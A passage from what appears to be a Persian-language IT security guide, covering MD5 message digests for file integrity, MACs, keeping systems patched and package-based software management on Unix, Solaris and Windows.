‫ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺍﺑﺰﺍﺭ ﻗﻮﻱ ﺑﺮﺍﻱ ﺁﺷﻜﺎﺭﺳﺎﺯﻱ ﺗﻐﻴﻴﺮﺍﺕ ﺑﺴﻴﺎﺭ ﻛﻮﭼﻚ ﺩﺭ ﻓﺎﻳﻠﻬﺎ ﻳﺎ ﭘﻴﺎﻣﻬﺎﻱ ﺑﺴﻴﺎﺭ ﺑـﺰﺭﮒ ﻫـﺴﺘﻨﺪ‪ .‬ﺑـﺮﺍﻱ ﭘﻴﺎﻣﺘـﺎﻥ ﻛـﺪ‬
‫‪ MD5‬ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ ﻭ ﺁﻧﺮﺍ ﺑﻪ ﻛﻨﺎﺭﻱ ﺑﮕﺬﺍﺭﻳﺪ؛ ﺑﻌﺪ ﺍﺯ ﻣﺪﺗﻲ ﺍﮔﺮ ﻓﻜﺮ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﻓﺎﻳﻞ )ﻋﻤﺪﹰﺍ ﻳﺎ ﺳﻬﻮﹰﺍ( ﺗﻐﻴﻴـﺮ ﻳﺎﻓﺘـﻪ ﻛـﺎﻓﻲ ﺍﺳـﺖ ﻛـﺪ‬
‫‪ MD5‬ﺭﺍ ﻣﺠﺪﺩﹰﺍ ﻣﺤﺎﺳﺒﻪ ﻛﻨﻴﺪ ﻭ ﺑﺎ ﺁﻥ ‪ MD5‬ﻛﻪ ﺑﺎﺭ ﺍﻭﻝ ﻣﺤﺎﺳﺒﻪ ﻛﺮﺩﻳﺪ ﻣﻘﺎﻳﺴﻪ ﻧﻤﺎﺋﻴﺪ‪ .‬ﺍﮔﺮ ﺑﺎ ﻫﻢ ﻣﻄﺎﺑﻘﺖ ﻛﺮﺩﻧﺪ‪ ،‬ﺑـﺎ ﺍﻃﻤﻴﻨـﺎﻥ ﺯﻳـﺎﺩ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﻓﺮﺽ ﺭﺍ ﺑﺮﺁﻥ ﺑﮕﺬﺍﺭﻳﺪ ﻛﻪ ﻓﺎﻳﻞ ﺗﻐﻴﻴﺮ ﻧﻴﺎﻓﺘﻪ ﺍﺳﺖ‪.‬‬

‫ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺑﺪﻟﻴﻞ ﻭﻳﮋﮔﻴﻬﺎﻳﺸﺎﻥ ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﻣﺮﻭﺯﻱ ﻧﻴﺰ ﻫﺴﺘﻨﺪ‪ .‬ﺧﻼﺻﻪﭘﻴﺎﻣﻬـﺎ ﻣﺒﻨـﺎﻱ‬
‫ﺍﻏﻠﺐ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﻣﺮﻭﺯﻱ ﺗﺼﺮﻳﺢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺠﺎﻱ ﻛـﻞ ﺳـﻨﺪ ﻛـﺎﻓﻲ‬
‫ﺍﺳﺖ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺳﻨﺪ ﺍﻣﻀﺎ ﺷﻮﺩ‪.‬‬
‫ﺧﻼﺻﻪﭘﻴﺎﻣﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺁﺳﺎﻧﻲ ﺑﺮﺍﻱ ﺗﻜﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﭘﻴﺎﻡ ﻛـﻪ ﻳـﻚ ﺭﻣـﺰ ﻣـﺸﺘﺮﻙ ﺑـﻴﻦ ﺩﻭ ﻃـﺮﻑ ﺍﺭﺗﺒـﺎﻁ‬
‫ﻣﻲﺑﺎﺷﻨﺪ ﻭ ﺗﺄﻳﻴﺪ ﭘﻴﺎﻡ ﺭﺍ ﺛﺎﺑﺖ ﻣﻲﻛﻨﻨﺪ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪MAC .‬ﻫﺎ ﺑﻪ ﺍﻧﺘﻬﺎﻱ ﭘﻴﺎﻣﻲ ﻛﻪ ﺑﺎﻳﺪ ﺗﺄﻳﻴﺪ ﺻﺤﺖ ﺷﻮﺩ ﺿﻤﻴﻤﻪ ﻣﻲﺷـﻮﻧﺪ )‪ RFC‬ﺷـﻤﺎﺭﺓ‬
‫‪ ٢١٠٤‬ﭼﮕﻮﻧﮕﻲ ﻛﺎﺭﺑﺮﺩ ﺩﺭﻫﻢﺭﻳﺰﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺻﺤﺖ ﭘﻴﺎﻡ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ(‪MAC .‬ﻫﺎﺋﻲ ﻛﻪ ﺑﺮ ﭘﺎﻳـﺔ ﺧﻼﺻـﻪﭘﻴﺎﻣﻬـﺎ ﻫـﺴﺘﻨﺪ ﺍﻣﻨﻴـﺖ‬
‫ﺑﻴﺸﺘﺮﻱ ﺑﺮﺍﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﻣﺴﻴﺮﻳﺎﺑﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﻧﺪ‪.‬‬

‫ﺣﻔﻆ ﻳﻜﭙﺎﺭﭼﮕﻲ‬
‫ﺣﻔﻆ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﻣﻨﻴﺖ ﻛﻠﻲ ﻭ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪ .‬ﺷـﻤﺎ‬
‫ﺑﺎﻳﺪ ﺍﺯ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‪ ،‬ﻳﻜﭙﺎﺭﭼﮕﻲ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ‪ ،‬ﻭ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫﺎﻳﺘـﺎﻥ ﺍﻃﻤﻴﻨـﺎﻥ ﺣﺎﺻـﻞ ﻛﻨﻴـﺪ‪ .‬ﺩﺭﺧـﺼﻮﺹ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ‪ ،‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻧﻪﺗﻨﻬﺎ ﻣﺴﺘﻠﺰﻡ ﻧﻈﺎﺭﺕ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮﺍﺕ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﻤﺎ ﺍﺳﺖ‪ ،‬ﺑﻠﻜﻪ ﻫﻤﭽﻨـﻴﻦ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺍﻋﻤﺎﻝ ﻭﺻﻠﻪﻫﺎ ﻭ ﺍﺻﻼﺣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﺣﻔﻆ ﺍﻳﻤﻨﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﻣﻲﺷﻮﺩ‪.‬‬

‫ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺳﻴﺴﺘﻤﻬﺎ‬


‫ﺍﺯ ﻟﺤﻈﻪﺍﻱ ﻛﻪ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ‪ ١٠٧‬ﻳﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻭﺻﻞ ﻣـﻲﺷـﻮﺩ‪ ،‬ﺩﺭ ﻣﻌـﺮﺽ ﺗﻼﺷـﻬﺎﻱ ﻛـﺸﻒ ﻭ ﺩﺳـﺘﻴﺎﺑﻲ ﺍﻓـﺮﺍﺩ‬
‫ﻧﺎﺧﻮﺍﻧﺪﺓ ﺑﻴﺮﻭﻧﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ‪ .‬ﻣﻬﺎﺟﻤﻴﻦ‪ ،‬ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺟﺪﻳﺪ ﺭﺍ ﺑﺎ ﺳﺮﻋﺘﻲ ﺷﮕﻔﺖﺁﻭﺭ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺟﺰﺋﻴﺎﺕ ﮔﺰﺍﺭﺵ ﺷﺪﻩ ﺩﺭ ﺍﻳـﻦ‬
‫ﻣﻮﺭﺩ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺑﻲ ﻛﻪ ﺗﻮﺳﻂ ﻃﺮﺡ ‪ Honeynet‬ﺣﻤﺎﻳﺖ ﻣﻲﺷﻮﺩ ‪ - http://project.honeynet.org/ -‬ﭘﻴﺪﺍ ﻛﺮﺩ‪ .‬ﺩﺭ‬
‫ﻳﻚ ﻣﻮﺭﺩ‪ ،‬ﻳﻚ ﺳﻴﺴﺘﻢ ‪ Honeynet‬ﻛﻪ ﺟﺪﻳﺪﹰﺍ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩ ﺑﻮﺩ‪ ،‬ﺗﻨﻬﺎ ‪ ۱۵‬ﺩﻗﻴﻘﻪ ﺑﻌﺪ ﺍﺯ ﺁﻧﻜﻪ ﺩﺭ ﺷﺒﻜﻪ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪ ﺑـﺎ ﻣﻮﻓﻘﻴـﺖ‬
‫ﻫﺪﻑ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺖ‪ .‬ﻟﺬﺍ ﻻﺯﻡ ﺍﺳﺖ ﻫﺮ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﻭﺍﺭﺩ ﺷﺒﻜﻪ ﻣﻲﺷﻮﺩ ‪ -‬ﻫـﻢ ﻗﺒـﻞ ﺍﺯ ﺍﺗـﺼﺎﻝ ﺑـﻪ ﺷـﺒﻜﻪ ﻭ ﻫـﻢ ﺑﻌـﺪ ﺍﺯ ﺁﻥ ‪ -‬ﺑـﺎ‬
‫ﺍﺻﻼﺣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺑﻪﺭﻭﺯ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﺷﻮﺩ‪.‬‬

‫‪106 Cipher Feedback Mode‬‬


‫‪107 Workstation‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٠٠‬‬

‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ‬


‫ﺳﻴﺴﺘﻢ ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﻚ ﺩﺳﺘﻪ ﺍﺑﺰﺍﺭﻫﺎ ﻭ ﺭﻭﺍﻟﻬﺎ ﺍﺳﺖ ﺑﺮﺍﻱ ﺣﻔﻆ ﺭﺩﻳﺎﺑﻲ ﺍﻳﻨﻜﻪ ﭼﻪ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﻛﺪﺍﻡ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻧﺼﺐ ﺷﺪﻩ ﻫﺴﺘﻨﺪ‪،‬‬
‫ﻭ ﺍﻳﻨﻜﻪ ﺁﻳﺎ ﻫﻴﭻ ﺗﻐﻴﻴﺮﺍﺕ ﻣﺤﻠﻲ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﺎ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺁﻥ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ ﻳﺎ ﻧﻪ‪ .‬ﺑﺪﻭﻥ ﭼﻨﻴﻦ ﺳﻴﺴﺘﻤﻲ ﺍﻣﻜﺎﻥ ﺍﻳﻨﻜﻪ ﺑﺪﺍﻧﻴﻢ ﺁﻳﺎ‬
‫ﻳﻚ ﺟﺰﺀ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻻﺯﻡ ﺍﺳﺖ ﺑﻪ ﺭﻭﺯ ﺷﻮﺩ ﻳﺎ ﺍﻳﻨﻜﻪ ﭼﻪ ﺗﻐﻴﻴﺮﺍﺕ ﻣﺤﻠﻲ ﺻﻮﺭﺕ ﭘﺬﻳﺮﻓﺘﻪ ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﭘﺲ ﺍﺯ ﺑﻪ ﺭﻭﺯ ﺩﺭ ﺁﻣـﺪﻥ ﻣﺤﻔـﻮﻅ‬
‫ﺑﻤﺎﻧﺪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻱ ﺳﻴﺴﺘﻢ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﺍﻣﻨﻴﺘﻲ ﺣﻴـﺎﺗﻲ ﻭ ﺑـﺮﺍﻱ ﺍﺭﺗﻘﺎﻫـﺎﻱ‬
‫ﻏﻴﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﻣﻔﻴﺪ ﺍﺳﺖ‪.‬‬
‫ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﺔ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows NT‬ﻧﻮﻋﻲ ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑـﺮﺍﻱ ﺍﺟـﺰﺍﻱ ﻣﺮﻛـﺰﻱ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺑﺎ ﺁﻧﻬﺎ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻣﺘـﺪﺍﻭﻟﺘﺮﻳﻦ ﺭﻭﺵ‪ ،‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ "ﺑـﺴﺘﻪﻫـﺎﻱ‬
‫ﻣﺪﻳﺮﻳﺘﻲ" ‪ -‬ﻓﺎﻳﻠﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻭ ﻗﺎﺑﻞ ﺍﺟﺮﺍﻱ ﺍﺯ ﭘﻴﺶ ﺗﺮﺟﻤﻪﺷﺪﻩ ‪ -‬ﺍﺳﺖ ﻛﻪ ﺧﻮﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺑﺮﺭﺳﻲ ﺳﻴﺴﺘﻢ ﻣﺘﻮﺟﻪ ﺷﻮﻧﺪ ﻛﺪﺍﻣﻴﻚ ﺍﺯ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺼﺐ ﺷﻮﻧﺪ‪.‬‬

‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‬


‫ﻼ ﺗﺮﺟﻤﻪ ﺷﺪﻩﺍﻧـﺪ‪ ،‬ﻫﻤـﺮﺍﻩ ﻫﺮﮔﻮﻧـﻪ ﻓﺎﻳﻠﻬـﺎﻱ‬ ‫ﻲ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‪ ،‬ﻓﺎﻳﻠﻲ ﺷﺎﻣﻞ ﻳﻚ ﺩﺳﺘﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺍﺳﺖ ﻛﻪ ﻗﺒ ﹰ‬ ‫ﻳﻚ ﻓﺎﻳﻞ ﻧﻮﻋ ﹺ‬
‫ﻣﺮﺗﺒﻂ ﺍﺯ ﻗﺒﻴﻞ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎ‪ ،‬ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﭘﻴﺶﻓﺮﺽ‪ ،‬ﻭ ﻣﺴﺘﻨﺪﺍﺕ‪ .‬ﺗﺤﺖ ﺍﻏﻠﺐ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‪ ،‬ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺍﺭﺍﻱ‬
‫ﻓﺮﺍﺩﺍﺩﻩﻫﺎﻳﻲ‪ ١٠٨‬ﻣﺎﻧﻨﺪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﻧﻴﺰ ﻫﺴﺖ‪:‬‬
‫• ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﮕﺎﺭﺵ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺩﺭ ﺁﻥ ﺑﺴﺘﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؛‬
‫• ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﺴﺨﻪﻫﺎﻱ ﺳﺎﺯﮔﺎﺭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻳﺎ ﻣﻌﻤﺎﺭﻱﻫﺎﻱ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ؛‬
‫• ﻓﻬﺮﺳﺖ ﺳﺎﻳﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺍﻳﻦ ﺑﺴﺘﻪ ﺁﻧﻬﺎ ﺭﺍ ﻻﺯﻡ ﺩﺍﺭﺩ؛‬
‫• ﻓﻬﺮﺳﺖ ﺳﺎﻳﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺍﻳﻦ ﺑﺴﺘﻪ ﺑﺎ ﺁﻧﻬﺎ ﺩﺭ ﺗﻌﺎﺭﺽ ﺍﺳﺖ؛‬
‫• ﻓﻬﺮﺳﺖ ﺍﻳﻨﻜﻪ ﻛﺪﺍﻡ ﻓﺎﻳﻠﻬﺎ ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻫﺴﺘﻨﺪ )ﻳﺎ ﻓﻬﺮﺳﺖ ﻓﺎﻳﻠﻬﺎﻳﻲ ﮐﻪ ﮐﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﭘﺲ ﺍﺯ ﻧﺼﺐ ﺗﻐﻴﻴﺮ ﺩﻫﺪ(؛ ﻭ‬
‫• ﻓﺮﺍﻣﻴﻨﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﻗﺒﻞ‪ ،‬ﺩﺭ ﺧﻼﻝ‪ ،‬ﻭ ﭘﺲ ﺍﺯ ﻧﺼﺐ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺑﺴﺘﻪ ﺍﺟﺮﺍ ﺷﻮﻧﺪ‪.‬‬
‫ﺟﺰﺀ ﻣﻬﻢ ﺩﻳﮕﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‪ ،‬ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﻧﺴﺨﻪﻫﺎﻱ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ ﺍﺳـﺖ ﻛـﻪ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ ﻧـﺼﺐ‬
‫ﺷﺪﻩﺍﻧﺪ‪ .‬ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﻏﺎﻟﺒﹰﺎ ‪ Registery‬ﺍﻳﻦ ﻫﺪﻑ ﺭﺍ ﺗﺄﻣﻴﻦ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺳﺎﺩﻩ ﺍﺳﺖ‪ .‬ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻳﻚ ﻳﺎ ﺩﻭ ﻓﺮﻣﺎﻥ ﺳﺎﺩﻩ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺟﺪﻳـﺪ ﺭﺍ‬
‫ﻧﺼﺐ ﻳﺎ ﻭﻗﺘﻲ ﻳﻚ ﻧﺴﺨﻪ ﺟﺪﻳﺪ ﻳﺎ ﺍﺻﻼﺡﺷﺪﻩ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻓﻌﻠﻲ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﺪ‪ .‬ﭼﻮﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﺑﺴﺘﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺯ ﻗﺒـﻞ‬
‫ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﺑﺴﺘﺮ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺗﺮﺟﻤﻪ ﺷﺪﻩﺍﻧﺪ‪ ،‬ﻻﺯﻡ ﻧﻴﺴﺖ ﺭﺍﻫﺒﺮ ﺑﺮﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺑﺮﻧﺎﻣﻪ ﻭﻗﺖ ﺻﺮﻑ ﻛﻨﺪ‪.‬‬
‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﻌﻤﻮﻝ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧـﻪ ﻟﺰﻭﻣـﹰﺎ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ﺷـﻤﺎ ﺗﺮﺟﻤـﻪ‬
‫ﺷﺪﻩﺍﻧﺪ‪ .‬ﺍﮔﺮ ﻻﺯﻡ ﺍﺳﺖ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺘﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻛﺎﺭﻛﺮﺩﻥ ﺑﺎ ﻧﻮﻉ ﺧﺎﺻﻲ ﺍﺯ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﺑﺎ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﻻ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ ‪ -‬ﭼﻨﺎﻧﭽـﻪ ﺩﺭ‬
‫ﻏﻴﺮﻋﺎﺩﻱ ﺳﺎﺯﮔﺎﺭ ﻧﻤﺎﺋﻴﺪ‪ ،‬ﻳﺎ ﺍﮔﺮ ﺗﻨﻬﺎ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﺎ ﻳﻚ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺩﻟﺨـﻮﺍﻩ ﺍﺟـﺮﺍ ﻛﻨﻴـﺪ‪ ،‬ﺍﺣﺘﻤـﺎ ﹰ‬
‫ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ ‪ -‬ﺑﻴﺸﺘﺮ ﺑﻪ ﻛﺎﺭ ﺷﻤﺎ ﻣﻲﺁﻳﺪ‪ .‬ﻫﺴﺘﺔ ﺍﺻﻠﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ‪ Unix‬ﻧﻤﻮﻧﺔ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺍﺭﺍﺋﻪ ﻧﻤﻲﻛﻨﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺵ ﻣﺪﻳﺮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻣﻨﺎﺳـﺒﺘﺮ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ‬
‫ﺩﻳﮕﺮ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ‪ Solarix 2.x‬ﻓﺮﺍﻣﻴﻦ ‪) showren ،pkginfo ،pkgrm ،pkgadd‬ﻭ ﺳـﺎﻳﺮ ﻓـﺮﺍﻣﻴﻦ ﻣـﺸﺎﺑﻪ( ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﺍﺿﺎﻓﻪ‪ ،‬ﺣﺬﻑ‪ ،‬ﻭ ﻳﺎ ﺩﺭﻳﺎﻓﺖ ﻭﺿﻌﻴﺖ ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺯ ﭘﻮﺳﺘﻪ‪ ،‬ﻭ ﻓﺮﻣﺎﻥ ‪ admintool‬ﺭﺍ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺩﺭ ﻳـﻚ ﻣﺤـﻴﻂ‬
‫ﮔﺮﺍﻓﻴﻜﻲ ﻓﺮﺍﻫﻢ ﻛـﺮﺩﻩ ﺍﺳـﺖ‪ .‬ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﺍﺯ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ‪ WindowsUpdate‬ﺑـﺮﺍﻱ ‪ download‬ﻭ ﻧـﺼﺐ ﻣـﻮﺍﺭﺩ‬
